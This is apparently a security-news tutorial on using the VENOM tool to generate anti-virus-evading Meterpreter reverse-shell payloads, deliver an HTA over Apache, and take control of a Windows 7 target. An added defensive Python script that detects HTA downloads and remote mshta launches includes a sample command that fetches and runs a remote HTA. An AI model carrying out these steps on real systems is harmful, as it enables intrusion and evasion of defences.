VENOM – An Exploitation Tool to Bypass Anti-Virus Detection with Encrypted Payloads
Nowadays many malware families and payloads use encryption and packing (via packers) to evade anti-virus software, since AV products have difficulty detecting encrypted and packed malware and payloads.
Here we are going to learn about generating encrypted payloads using VENOM, a Metasploit shellcode generator/compiler/listener tool.
According to the tool's own description, the script uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh) and injects the generated shellcode into one function (for example, a Python function that executes the shellcode in RAM).
It then uses compilers such as gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file, and also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).
Step 1:
Since this tool is not installed by default, we need to download and install it on Kali Linux.
Please use this link to download VENOM from the Sourceforge website: Download Link.
Once downloaded, extract the ZIP and run the tool. Here I kept the package on my Desktop.
Step 2:
After launching the tool, it will ask you to click OK to continue to the further options.
Step 3:
The next screen shows information about the option built, target machine, payload format, and output.
The 20 different shellcode build options are listed here. We are using shellcode number 10 for this demonstration.
So here we chose Venom shellcode number 10 and pressed OK.
Step 4:
In this step, we need to set the local host IP address. Enter the IP address of your local machine (the one that will listen for the payload's connection) and press OK to reach the next setting.
Once we have set our LHOST, it will ask you to enter your LPORT. Provide your desired LPORT number and press OK.
Step 5:
Venom contains some default msf payloads. Here we are using “windows/meterpreter/reverse_tcp”.
Step 6:
Here you can provide the name of the payload you are going to generate. Once you have selected the name, press OK.
Step 7:
Once the encrypted payload has been generated successfully, it is stored in the output folder of the Venom package:
root/Desktop/shell/output/gbhackers.hta
Step 8:
After successfully generating our encrypted payload, I scanned it to check anti-virus vendor detection. We have successfully evaded AV detection.
Here, let us use Metasploit with our encrypted payload against the victim.
Step 9:
We need to start the Apache server to deliver our malicious payload to the victim's machine. Once you select the server, click OK to continue.
Step 10:
In this step, we need to concentrate on the post-exploitation module. Here we can choose any one of the post-exploitation scripts.
I need to gain access only to system information, so I have chosen sysinfo.rc for post-exploitation of the target machine.
Since it is optional, you can also run this module manually after you have compromised the victim using Metasploit.
Step 11:
Finally, I have obtained a Meterpreter session on my target Windows 7 machine using our encrypted payload.
Before starting the session handler, make sure your payload has been successfully delivered to your target machine.
I executed my payload on my target machine using the malicious URL (http://192.168.56.103) that VENOM generated for our payload.
Before playing with Metasploit, check that your LPORT and LHOST settings have been set properly for listening for the session.
So finally, I have successfully bypassed the victim's AV and taken full control of my target Windows 7 machine.
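The delivery path in Steps 9 to 11 (an HTA served from Apache, then executed on the Windows client) leaves traces that a defender can look for. The following is an added example written for this article, not code from the VENOM project or from the author: it checks constructed Apache access-log lines for downloads of the file types VENOM emits, and checks constructed process-creation events for mshta.exe launched with a remote URL. The Apache "combined" log layout and the Sysmon-style `Image` / `CommandLine` field names are assumptions; every IP, hostname and path is a constructed sample value.

```python
"""Added example (not part of VENOM or the original article): flag the
delivery step from the defender's side using two constructed data sources.
"""
import re
from urllib.parse import urlparse

# Apache "combined" log format (assumed):
# ip - user [time] "METHOD path HTTP/x" status size "referer" "agent"
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The article lists VENOM's output formats (c | python | ruby | dll | msi | hta-psh);
# these are the extensions a web server would hand to a client.
PAYLOAD_EXTENSIONS = {".hta", ".msi", ".dll", ".exe", ".py", ".rb"}


def parse_apache_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = APACHE_RE.match(line)
    return m.groupdict() if m else None


def suspicious_downloads(log_lines):
    """Return (client_ip, path) for successful GETs of payload-like files."""
    hits = []
    for line in log_lines:
        rec = parse_apache_line(line)
        if rec is None or rec["method"] != "GET" or rec["status"] != "200":
            continue  # skip unparsable lines, non-GETs and failed requests
        path = urlparse(rec["path"]).path.lower()  # drop any query string
        if any(path.endswith(ext) for ext in PAYLOAD_EXTENSIONS):
            hits.append((rec["ip"], rec["path"]))
    return hits


def mshta_remote_launch(event):
    """True if a process-creation event is mshta.exe executing a remote (http/https) HTA.
    A local HTA path is not flagged, to keep the rule narrow."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("\\mshta.exe"):
        return False
    return re.search(r"https?://", cmd, re.IGNORECASE) is not None


# Constructed sample input (not real traffic). The .hta name mirrors the
# article's output file name; the addresses are private lab IPs.
SAMPLE_LOG = [
    '192.168.56.101 - - [10/Oct/2020:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.101 - - [10/Oct/2020:13:55:41 +0000] "GET /gbhackers.hta HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [10/Oct/2020:13:56:02 +0000] "GET /setup.msi HTTP/1.1" 404 210 "-" "curl/7.68.0"',
    '192.168.56.102 - - [10/Oct/2020:13:56:10 +0000] "GET /logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    'this line is not in apache format',
]

# Constructed process-creation events (Sysmon-style field names are assumed).
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://192.168.56.103/gbhackers.hta"},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": 'mshta.exe "C:\\Program Files\\Vendor\\help.hta"'},
    {"Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"},
]


def review(log_lines=SAMPLE_LOG, events=SAMPLE_EVENTS):
    """Collect both kinds of findings into one list of (kind, detail) tuples."""
    findings = [("download", f"{ip} fetched {path}")
                for ip, path in suspicious_downloads(log_lines)]
    findings += [("mshta", ev["CommandLine"])
                 for ev in events if mshta_remote_launch(ev)]
    return findings


if __name__ == "__main__":
    for kind, detail in review():
        print(f"[{kind}] {detail}")
```

On the constructed input, the web-log check reports only the successful HTA download (the 404 for the .msi is ignored), and the process check reports only the mshta.exe launch that references a URL; the locally installed help.hta is left alone. In a real deployment the same two checks would be fed from the web server's access log and from endpoint process-creation telemetry.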
If you have any further doubts or queries, kindly leave your comments. Happy hacking.
Disclaimer
This article is only for educational purposes. Any actions and/or activities related to the material contained within this website are solely your responsibility. The misuse of the information on this website can result in criminal charges being brought against the persons in question. The authors and www.gbhackers.com will not be held responsible in the event any criminal charges are brought against any individuals misusing the information on this website to break the law.
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.